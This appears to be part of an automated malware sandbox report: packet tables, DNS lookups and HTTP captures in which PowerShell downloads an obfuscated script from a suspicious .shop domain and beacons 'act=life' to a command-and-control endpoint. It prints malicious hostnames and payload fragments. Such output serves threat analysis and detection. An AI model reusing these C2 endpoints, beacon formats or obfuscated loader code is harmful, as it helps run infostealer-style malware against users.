                                                                                      Jan 12, 2025 17:25:24.864118099 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.864196062 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:24.866422892 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:24.866432905 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.866650105 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.867961884 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:24.911335945 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.390645027 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.390666008 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.390680075 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.390717030 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:25.390753984 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.390780926 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:25.390808105 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:25.483277082 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.483299017 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.483367920 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:25.483381987 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.483424902 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:25.488241911 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.488295078 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:25.488301039 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.488332987 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.488342047 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:25.488377094 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:25.491513014 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:25.491533041 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.491545916 CET49993443192.168.2.6104.102.49.254
                                                                                      Jan 12, 2025 17:25:25.491553068 CET44349993104.102.49.254192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.508413076 CET49994443192.168.2.6104.21.14.233
                                                                                      Jan 12, 2025 17:25:25.508474112 CET44349994104.21.14.233192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.508552074 CET49994443192.168.2.6104.21.14.233
                                                                                      Jan 12, 2025 17:25:25.508889914 CET49994443192.168.2.6104.21.14.233
                                                                                      Jan 12, 2025 17:25:25.508905888 CET44349994104.21.14.233192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.992279053 CET44349994104.21.14.233192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.992393970 CET49994443192.168.2.6104.21.14.233
                                                                                      Jan 12, 2025 17:25:25.998090982 CET49994443192.168.2.6104.21.14.233
                                                                                      Jan 12, 2025 17:25:25.998101950 CET44349994104.21.14.233192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.998317003 CET44349994104.21.14.233192.168.2.6
                                                                                      Jan 12, 2025 17:25:26.000204086 CET49994443192.168.2.6104.21.14.233
                                                                                      Jan 12, 2025 17:25:26.000240088 CET49994443192.168.2.6104.21.14.233
                                                                                      Jan 12, 2025 17:25:26.000257969 CET44349994104.21.14.233192.168.2.6
                                                                                      Jan 12, 2025 17:25:26.436131954 CET44349994104.21.14.233192.168.2.6
                                                                                      Jan 12, 2025 17:25:26.436213017 CET44349994104.21.14.233192.168.2.6
                                                                                      Jan 12, 2025 17:25:26.436269999 CET49994443192.168.2.6104.21.14.233
                                                                                      Jan 12, 2025 17:25:26.436481953 CET49994443192.168.2.6104.21.14.233
                                                                                      Jan 12, 2025 17:25:26.436506987 CET44349994104.21.14.233192.168.2.6
                                                                                      Jan 12, 2025 17:25:26.436526060 CET49994443192.168.2.6104.21.14.233
                                                                                      Jan 12, 2025 17:25:26.436532974 CET44349994104.21.14.233192.168.2.6
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 12, 2025 17:24:03.021003008 CET5813453192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:24:03.034759045 CET53581341.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:23.092320919 CET5064853192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:23.134320974 CET53506481.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.084009886 CET6025853192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:24.093169928 CET53602581.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.097851992 CET5431253192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:24.106703043 CET53543121.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.111073971 CET5839353192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:24.119621992 CET53583931.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.122863054 CET6374453192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:24.134357929 CET53637441.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.143224955 CET5729653192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:24.152204037 CET53572961.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.157052040 CET5123653192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:24.166220903 CET53512361.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.167193890 CET6518953192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:24.176100016 CET53651891.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.182213068 CET6512353192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:24.191818953 CET53651231.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:24.198348045 CET6351753192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:24.205177069 CET53635171.1.1.1192.168.2.6
                                                                                      Jan 12, 2025 17:25:25.496771097 CET5171953192.168.2.61.1.1.1
                                                                                      Jan 12, 2025 17:25:25.507518053 CET53517191.1.1.1192.168.2.6
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 12, 2025 17:24:03.021003008 CET192.168.2.61.1.1.10x16e1Standard query (0)h2.errantrefrainundocked.shopA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:23.092320919 CET192.168.2.61.1.1.10x20cdStandard query (0)degreehourz.clickA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.084009886 CET192.168.2.61.1.1.10xe25eStandard query (0)fraggielek.bizA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.097851992 CET192.168.2.61.1.1.10xdb57Standard query (0)grandiouseziu.bizA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.111073971 CET192.168.2.61.1.1.10x7814Standard query (0)littlenotii.bizA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.122863054 CET192.168.2.61.1.1.10xe94bStandard query (0)marketlumpe.bizA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.143224955 CET192.168.2.61.1.1.10x39b1Standard query (0)nuttyshopr.bizA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.157052040 CET192.168.2.61.1.1.10xb634Standard query (0)punishzement.bizA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.167193890 CET192.168.2.61.1.1.10x6611Standard query (0)spookycappy.bizA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.182213068 CET192.168.2.61.1.1.10xded9Standard query (0)truculengisau.bizA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.198348045 CET192.168.2.61.1.1.10x14a6Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:25.496771097 CET192.168.2.61.1.1.10xf7ceStandard query (0)misha-lomonosov.comA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 12, 2025 17:24:03.034759045 CET1.1.1.1192.168.2.60x16e1No error (0)h2.errantrefrainundocked.shop104.26.11.53A (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:24:03.034759045 CET1.1.1.1192.168.2.60x16e1No error (0)h2.errantrefrainundocked.shop104.26.10.53A (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:24:03.034759045 CET1.1.1.1192.168.2.60x16e1No error (0)h2.errantrefrainundocked.shop172.67.74.77A (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:23.134320974 CET1.1.1.1192.168.2.60x20cdNo error (0)degreehourz.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:23.134320974 CET1.1.1.1192.168.2.60x20cdNo error (0)degreehourz.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.093169928 CET1.1.1.1192.168.2.60xe25eName error (3)fraggielek.biznonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.106703043 CET1.1.1.1192.168.2.60xdb57Name error (3)grandiouseziu.biznonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.119621992 CET1.1.1.1192.168.2.60x7814Name error (3)littlenotii.biznonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.134357929 CET1.1.1.1192.168.2.60xe94bName error (3)marketlumpe.biznonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.152204037 CET1.1.1.1192.168.2.60x39b1Name error (3)nuttyshopr.biznonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.166220903 CET1.1.1.1192.168.2.60xb634Name error (3)punishzement.biznonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.176100016 CET1.1.1.1192.168.2.60x6611Name error (3)spookycappy.biznonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.191818953 CET1.1.1.1192.168.2.60xded9Name error (3)truculengisau.biznonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:24.205177069 CET1.1.1.1192.168.2.60x14a6No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:25.507518053 CET1.1.1.1192.168.2.60xf7ceNo error (0)misha-lomonosov.com104.21.14.233A (IP address)IN (0x0001)false
                                                                                      Jan 12, 2025 17:25:25.507518053 CET1.1.1.1192.168.2.60xf7ceNo error (0)misha-lomonosov.com172.67.160.193A (IP address)IN (0x0001)false
                                                                                      • h2.errantrefrainundocked.shop
                                                                                      • degreehourz.click
                                                                                      • steamcommunity.com
                                                                                      • misha-lomonosov.com
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.649712104.26.11.534433548C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-12 16:24:03 UTC88OUTGET /rii2.file HTTP/1.1
                                                                                      Host: h2.errantrefrainundocked.shop
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-12 16:24:04 UTC893INHTTP/1.1 200 OK
                                                                                      Date: Sun, 12 Jan 2025 16:24:04 GMT
                                                                                      Content-Length: 8996598
                                                                                      Connection: close
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "00317b9ff31f7aa93f7c7891e0202331"
                                                                                      Last-Modified: Fri, 10 Jan 2025 19:23:51 GMT
                                                                                      Vary: Accept-Encoding
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tcOQ8HQZkx4hiKj%2FEg%2BaL12wanHbM2tFhVDZAE4kCBQXxUvvckWuO01NXGhk6ha3XBtXdUPNHUobXU3acx9DKj%2BsFtsOUVHfC8THZCIvNne33Sb70kzPOe6JZAaISD0r4f0e7cBGJU%2BgcPpa56se"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 900e7e9fad5e4381-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1656&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2883&recv_bytes=702&delivery_rate=1763285&cwnd=211&unsent_bytes=0&cid=87c65f8da17db97e&ts=654&x=0"
                                                                                      2025-01-12 16:24:04 UTC476INData Raw: 0d 0a 24 75 76 52 41 42 45 41 70 5a 20 3d 20 28 28 28 28 28 28 28 2d 33 32 20 2a 20 33 34 34 31 30 29 20 2b 20 32 38 32 30 30 29 20 2b 20 34 39 35 36 29 20 2a 20 28 28 28 28 28 2d 36 20 2d 20 24 75 76 52 41 42 45 41 70 5a 29 20 2b 20 37 38 39 38 39 29 20 2a 20 30 29 20 2b 20 24 75 76 52 41 42 45 41 70 5a 29 29 29 20 2d 20 24 75 76 52 41 42 45 41 70 5a 29 29 20 2d 20 28 28 28 24 75 76 52 41 42 45 41 70 5a 20 2d 20 32 33 33 31 32 29 20 2d 20 24 75 76 52 41 42 45 41 70 5a 29 20 2b 20 38 39 30 38 29 29 0d 0a 24 57 4e 70 41 58 78 4a 76 20 3d 20 28 28 28 28 28 24 75 76 52 41 42 45 41 70 5a 20 2b 20 24 75 76 52 41 42 45 41 70 5a 29 20 2d 20 28 28 28 28 28 28 24 75 76 52 41 42 45 41 70 5a 20 2b 20 24 75 76 52 41 42 45 41 70 5a 29 20 2d 20 24 75 76 52 41 42 45 41
                                                                                      Data Ascii: $uvRABEApZ = (((((((-32 * 34410) + 28200) + 4956) * (((((-6 - $uvRABEApZ) + 78989) * 0) + $uvRABEApZ))) - $uvRABEApZ)) - ((($uvRABEApZ - 23312) - $uvRABEApZ) + 8908))$WNpAXxJv = ((((($uvRABEApZ + $uvRABEApZ) - (((((($uvRABEApZ + $uvRABEApZ) - $uvRABEA
                                                                                      2025-01-12 16:24:04 UTC1369INData Raw: 41 65 79 51 20 3d 20 28 28 28 33 20 2d 20 24 72 49 68 74 72 62 58 71 51 6d 29 20 2b 20 2d 33 30 34 34 29 20 2a 20 24 58 78 58 57 44 4a 64 58 48 66 29 0d 0a 24 55 4e 6b 79 49 7a 6d 74 78 63 69 20 3d 20 28 28 28 28 28 2d 31 31 33 31 20 2d 20 24 74 6f 7a 73 78 41 65 79 51 29 20 2b 20 28 28 28 28 24 72 49 68 74 72 62 58 71 51 6d 20 2d 20 24 72 49 68 74 72 62 58 71 51 6d 29 20 2a 20 24 75 76 52 41 42 45 41 70 5a 29 20 2a 20 24 72 49 68 74 72 62 58 71 51 6d 29 29 29 20 2d 20 28 28 28 28 33 38 34 20 2b 20 24 72 49 68 74 72 62 58 71 51 6d 29 20 2b 20 24 57 4e 70 41 58 78 4a 76 29 20 2d 20 24 55 4e 6b 79 49 7a 6d 74 78 63 69 29 29 29 29 20 2a 20 28 28 24 55 4e 6b 79 49 7a 6d 74 78 63 69 20 2a 20 35 32 33 29 20 2d 20 35 34 32 29 29 0d 0a 24 4a 75 6d 67 64 57 49 79
                                                                                      Data Ascii: AeyQ = (((3 - $rIhtrbXqQm) + -3044) * $XxXWDJdXHf)$UNkyIzmtxci = (((((-1131 - $tozsxAeyQ) + (((($rIhtrbXqQm - $rIhtrbXqQm) * $uvRABEApZ) * $rIhtrbXqQm))) - ((((384 + $rIhtrbXqQm) + $WNpAXxJv) - $UNkyIzmtxci)))) * (($UNkyIzmtxci * 523) - 542))$JumgdWIy
                                                                                      2025-01-12 16:24:04 UTC1369INData Raw: 6b 61 20 3d 20 28 28 28 28 2d 39 36 33 20 2d 20 28 28 28 28 28 28 24 59 62 59 44 6c 50 44 6d 68 20 2b 20 24 74 6f 7a 73 78 41 65 79 51 29 20 2d 20 24 58 78 58 57 44 4a 64 58 48 66 29 20 2a 20 24 59 62 59 44 6c 50 44 6d 68 29 20 2a 20 24 57 4e 70 41 58 78 4a 76 29 20 2d 20 31 36 38 37 29 29 29 20 2d 20 24 4f 70 6e 53 44 66 6d 42 6f 29 20 2a 20 28 28 28 28 28 2d 32 37 37 30 32 35 20 2b 20 2d 32 29 20 2a 20 2d 34 39 38 35 29 20 2d 20 2d 31 31 30 34 29 20 2b 20 24 74 6f 7a 73 78 41 65 79 51 29 29 29 20 2d 20 39 31 36 33 29 0d 0a 24 43 68 6a 76 77 70 53 5a 42 20 3d 20 28 28 28 24 72 49 68 74 72 62 58 71 51 6d 20 2d 20 24 67 66 6e 61 4b 66 29 20 2d 20 28 28 28 2d 36 37 36 33 20 2a 20 24 43 68 6a 76 77 70 53 5a 42 29 20 2b 20 24 42 44 6e 41 73 7a 29 29 29 20 2b
                                                                                      Data Ascii: ka = ((((-963 - (((((($YbYDlPDmh + $tozsxAeyQ) - $XxXWDJdXHf) * $YbYDlPDmh) * $WNpAXxJv) - 1687))) - $OpnSDfmBo) * (((((-277025 + -2) * -4985) - -1104) + $tozsxAeyQ))) - 9163)$ChjvwpSZB = ((($rIhtrbXqQm - $gfnaKf) - (((-6763 * $ChjvwpSZB) + $BDnAsz))) +
                                                                                      2025-01-12 16:24:04 UTC1369INData Raw: 20 2b 20 28 28 28 28 2d 37 30 36 20 2d 20 2d 37 37 38 32 30 39 29 20 2a 20 38 33 30 38 29 20 2d 20 24 79 4e 65 71 50 4a 49 29 29 29 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 24 6c 53 66 4d 54 79 79 6a 55 2d 2d 0d 0a 7d 0d 0a 24 52 50 45 50 44 74 68 20 3d 20 28 28 28 28 28 28 24 68 53 77 62 6e 47 55 59 6f 6b 76 20 2b 20 28 28 28 34 20 2b 20 28 28 28 28 28 24 55 4e 6b 79 49 7a 6d 74 78 63 69 20 2d 20 2d 35 35 38 31 29 20 2a 20 28 28 28 28 28 37 36 39 30 20 2d 20 24 52 50 45 50 44 74 68 29 20 2a 20 24 52 50 45 50 44 74 68 29 20 2a 20 24 6c 46 56 6e 47 4c 52 51 56 29 20 2a 20 2d 37 32 36 35 37 30 29 29 29 20 2a 20 34 36 36 35 30 29 20 2d 20 38 30 29 29 29 20 2b 20 28 28 28 28 28 28 28 2d 31 20 2a 20 36 31 29 20 2b 20 28 28 28 28 28 39 20 2d 20 24 75 76 52 41 42
                                                                                      Data Ascii: + ((((-706 - -778209) * 8308) - $yNeqPJI))) } $lSfMTyyjU--}$RPEPDth = (((((($hSwbnGUYokv + (((4 + ((((($UNkyIzmtxci - -5581) * (((((7690 - $RPEPDth) * $RPEPDth) * $lFVnGLRQV) * -726570))) * 46650) - 80))) + (((((((-1 * 61) + (((((9 - $uvRAB
                                                                                      2025-01-12 16:24:04 UTC1369INData Raw: 73 78 41 65 79 51 20 2a 20 36 32 29 20 2d 20 28 28 28 28 28 38 37 31 32 32 39 20 2b 20 2d 33 30 37 34 29 20 2b 20 28 28 28 24 43 68 6a 76 77 70 53 5a 42 20 2d 20 2d 36 29 20 2a 20 2d 39 32 31 37 33 30 29 29 29 20 2d 20 28 28 28 28 28 2d 31 35 20 2d 20 24 4a 75 6d 67 64 57 49 79 29 20 2b 20 35 39 36 37 35 31 29 20 2a 20 24 52 50 45 50 44 74 68 29 20 2d 20 37 29 29 29 20 2a 20 28 28 28 28 24 43 68 6a 76 77 70 53 5a 42 20 2b 20 24 58 78 58 57 44 4a 64 58 48 66 29 20 2d 20 2d 39 39 36 29 20 2d 20 31 30 36 31 29 29 29 29 29 20 2d 20 28 28 28 2d 34 37 33 20 2d 20 2d 38 30 35 29 20 2a 20 28 28 28 24 43 6f 68 53 7a 66 5a 20 2d 20 24 59 62 59 44 6c 50 44 6d 68 29 20 2a 20 2d 36 34 29 29 29 29 29 29 20 2b 20 28 28 28 28 28 28 2d 38 36 33 32 20 2b 20 33 36 39 32 30
                                                                                      Data Ascii: sxAeyQ * 62) - (((((871229 + -3074) + ((($ChjvwpSZB - -6) * -921730))) - (((((-15 - $JumgdWIy) + 596751) * $RPEPDth) - 7))) * (((($ChjvwpSZB + $XxXWDJdXHf) - -996) - 1061))))) - (((-473 - -805) * ((($CohSzfZ - $YbYDlPDmh) * -64)))))) + ((((((-8632 + 36920
                                                                                      2025-01-12 16:24:04 UTC1369INData Raw: 68 6a 76 77 70 53 5a 42 29 20 2d 20 24 4f 70 6e 53 44 66 6d 42 6f 29 29 29 20 2b 20 2d 32 39 29 29 20 2b 20 28 28 28 28 28 2d 34 20 2a 20 28 28 28 2d 31 38 20 2d 20 24 75 76 52 41 42 45 41 70 5a 29 20 2a 20 24 68 54 52 4a 62 4a 66 66 29 29 29 20 2a 20 35 34 39 35 33 29 20 2a 20 31 29 29 20 2a 20 28 28 24 55 4e 6b 79 49 7a 6d 74 78 63 69 20 2d 20 24 61 50 4f 72 64 43 42 51 29 20 2a 20 24 7a 46 50 64 4a 64 4a 47 43 7a 73 29 29 29 0d 0a 7d 0d 0a 24 58 78 58 57 44 4a 64 58 48 66 20 3d 20 28 28 28 24 59 62 59 44 6c 50 44 6d 68 20 2d 20 24 72 49 68 74 72 62 58 71 51 6d 29 20 2d 20 24 75 76 52 41 42 45 41 70 5a 29 20 2b 20 2d 38 36 30 37 39 34 29 0d 0a 24 54 56 6a 50 64 7a 77 58 6d 7a 20 3d 20 34 0d 0a 77 68 69 6c 65 20 28 24 54 56 6a 50 64 7a 77 58 6d 7a 20 2d
                                                                                      Data Ascii: hjvwpSZB) - $OpnSDfmBo))) + -29)) + (((((-4 * (((-18 - $uvRABEApZ) * $hTRJbJff))) * 54953) * 1)) * (($UNkyIzmtxci - $aPOrdCBQ) * $zFPdJdJGCzs)))}$XxXWDJdXHf = ((($YbYDlPDmh - $rIhtrbXqQm) - $uvRABEApZ) + -860794)$TVjPdzwXmz = 4while ($TVjPdzwXmz -
                                                                                      2025-01-12 16:24:04 UTC1369INData Raw: 58 48 66 20 2d 20 24 59 62 59 44 6c 50 44 6d 68 29 20 2d 20 2d 31 29 29 29 20 2b 20 35 30 37 31 33 39 29 20 2a 20 31 29 20 2d 20 36 32 34 34 29 29 29 20 2d 20 28 28 28 28 28 28 24 76 46 74 63 6f 55 6b 61 20 2d 20 24 6d 61 6f 6f 58 59 79 4d 44 29 20 2b 20 24 43 6f 68 53 7a 66 5a 29 20 2d 20 28 28 28 28 28 28 2d 33 31 33 32 38 32 20 2d 20 28 28 28 28 28 2d 37 38 32 33 20 2a 20 24 78 43 57 78 58 77 78 29 20 2a 20 24 74 6f 7a 73 78 41 65 79 51 29 20 2a 20 32 31 36 31 34 29 20 2d 20 35 29 29 29 20 2d 20 28 28 28 24 61 50 4f 72 64 43 42 51 20 2b 20 32 30 37 29 20 2d 20 24 58 78 58 57 44 4a 64 58 48 66 29 29 29 20 2b 20 31 29 20 2a 20 24 71 4a 68 4f 63 45 43 46 6e 57 29 20 2b 20 31 36 36 38 36 30 29 29 29 29 20 2b 20 28 28 28 28 24 76 46 74 63 6f 55 6b 61 20 2b
                                                                                      Data Ascii: XHf - $YbYDlPDmh) - -1))) + 507139) * 1) - 6244))) - (((((($vFtcoUka - $maooXYyMD) + $CohSzfZ) - ((((((-313282 - (((((-7823 * $xCWxXwx) * $tozsxAeyQ) * 21614) - 5))) - ((($aPOrdCBQ + 207) - $XxXWDJdXHf))) + 1) * $qJhOcECFnW) + 166860)))) + (((($vFtcoUka +
                                                                                      2025-01-12 16:24:04 UTC1369INData Raw: 2d 20 2d 35 37 29 20 2b 20 24 43 68 6a 76 77 70 53 5a 42 29 29 29 20 2a 20 24 61 50 4f 72 64 43 42 51 29 29 20 2d 20 28 28 28 28 38 34 33 30 34 20 2a 20 24 7a 46 50 64 4a 64 4a 47 43 7a 73 29 20 2a 20 24 58 78 58 57 44 4a 64 58 48 66 29 20 2a 20 24 76 46 74 63 6f 55 6b 61 29 20 2a 20 2d 37 32 32 29 29 0d 0a 20 20 20 20 24 57 63 4e 69 45 4f 4f 71 72 2d 2d 0d 0a 7d 0d 0a 24 70 6c 42 46 63 74 20 3d 20 32 0d 0a 77 68 69 6c 65 20 28 24 70 6c 42 46 63 74 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 28 24 55 4e 6b 79 49 7a 6d 74 78 63 69 20 2d 67 74 20 39 38 31 29 20 2d 6f 72 20 28 24 59 62 59 44 6c 50 44 6d 68 20 2d 67 74 20 2d 38 32 36 38 29 20 2d 6f 72 20 28 2d 37 38 39 33 35 30 20 2d 6c 74 20 2d 32 39 35 30 29 20 2d 6f 72 20 28 31 34 30 20 2d 6e
                                                                                      Data Ascii: - -57) + $ChjvwpSZB))) * $aPOrdCBQ)) - ((((84304 * $zFPdJdJGCzs) * $XxXWDJdXHf) * $vFtcoUka) * -722)) $WcNiEOOqr--}$plBFct = 2while ($plBFct -gt 0) { if (($UNkyIzmtxci -gt 981) -or ($YbYDlPDmh -gt -8268) -or (-789350 -lt -2950) -or (140 -n
                                                                                      2025-01-12 16:24:04 UTC1369INData Raw: 32 32 37 29 20 2d 20 24 43 6f 68 53 7a 66 5a 29 29 29 20 2b 20 24 52 50 45 50 44 74 68 29 29 20 2a 20 28 28 28 24 68 54 52 4a 62 4a 66 66 20 2b 20 2d 38 32 29 20 2a 20 31 31 39 37 29 20 2a 20 24 4f 70 6e 53 44 66 6d 42 6f 29 29 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 24 4f 45 54 4c 6e 75 63 51 78 66 6d 2d 2d 0d 0a 7d 0d 0a 24 46 71 4e 48 43 75 55 4b 41 20 3d 20 33 0d 0a 77 68 69 6c 65 20 28 24 46 71 4e 48 43 75 55 4b 41 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 24 78 43 57 78 58 77 78 20 3d 20 28 28 28 28 24 4a 75 6d 67 64 57 49 79 20 2a 20 24 75 76 52 41 42 45 41 70 5a 29 20 2b 20 2d 35 35 38 38 32 29 20 2a 20 37 32 29 20 2b 20 38 33 38 38 30 32 29 0d 0a 20 20 20 20 24 46 71 4e 48 43 75 55 4b 41 2d 2d 0d 0a 7d 0d 0a 24 55 4e 6b 79 49 7a 6d 74 78 63 69
                                                                                      Data Ascii: 227) - $CohSzfZ))) + $RPEPDth)) * ((($hTRJbJff + -82) * 1197) * $OpnSDfmBo)) } $OETLnucQxfm--}$FqNHCuUKA = 3while ($FqNHCuUKA -gt 0) { $xCWxXwx = (((($JumgdWIy * $uvRABEApZ) + -55882) * 72) + 838802) $FqNHCuUKA--}$UNkyIzmtxci
                                                                                      2025-01-12 16:24:04 UTC1369INData Raw: 29 0d 0a 20 20 20 20 69 66 20 28 28 24 43 68 6a 76 77 70 53 5a 42 20 2d 6c 65 20 39 34 29 20 2d 6f 72 20 28 36 31 37 38 20 2d 67 74 20 24 4f 70 6e 53 44 66 6d 42 6f 29 20 2d 6f 72 20 28 24 43 6f 68 53 7a 66 5a 20 2d 6e 65 20 24 4a 75 6d 67 64 57 49 79 29 20 2d 6f 72 20 28 36 38 33 37 31 30 20 2d 6c 65 20 24 43 6f 68 53 7a 66 5a 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 43 68 6a 76 77 70 53 5a 42 20 3d 20 28 28 28 28 24 7a 46 50 64 4a 64 4a 47 43 7a 73 20 2a 20 24 4f 75 46 62 53 42 51 58 70 29 20 2b 20 28 28 28 28 2d 39 37 31 38 20 2b 20 24 61 50 4f 72 64 43 42 51 29 20 2b 20 24 76 46 74 63 6f 55 6b 61 29 20 2d 20 24 68 54 52 4a 62 4a 66 66 29 29 29 29 20 2b 20 28 28 39 32 36 38 31 33 20 2d 20 2d 33 31 33 30 31 36 29 20 2a 20 2d 37 31 39 29 29 0d 0a 20
                                                                                      Data Ascii: ) if (($ChjvwpSZB -le 94) -or (6178 -gt $OpnSDfmBo) -or ($CohSzfZ -ne $JumgdWIy) -or (683710 -le $CohSzfZ)) { $ChjvwpSZB = (((($zFPdJdJGCzs * $OuFbSBQXp) + ((((-9718 + $aPOrdCBQ) + $vFtcoUka) - $hTRJbJff)))) + ((926813 - -313016) * -719))


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.649992188.114.97.34432792C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-12 16:25:23 UTC264OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: degreehourz.click
                                                                                      2025-01-12 16:25:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                      Data Ascii: act=life
                                                                                      2025-01-12 16:25:24 UTC1131INHTTP/1.1 200 OK
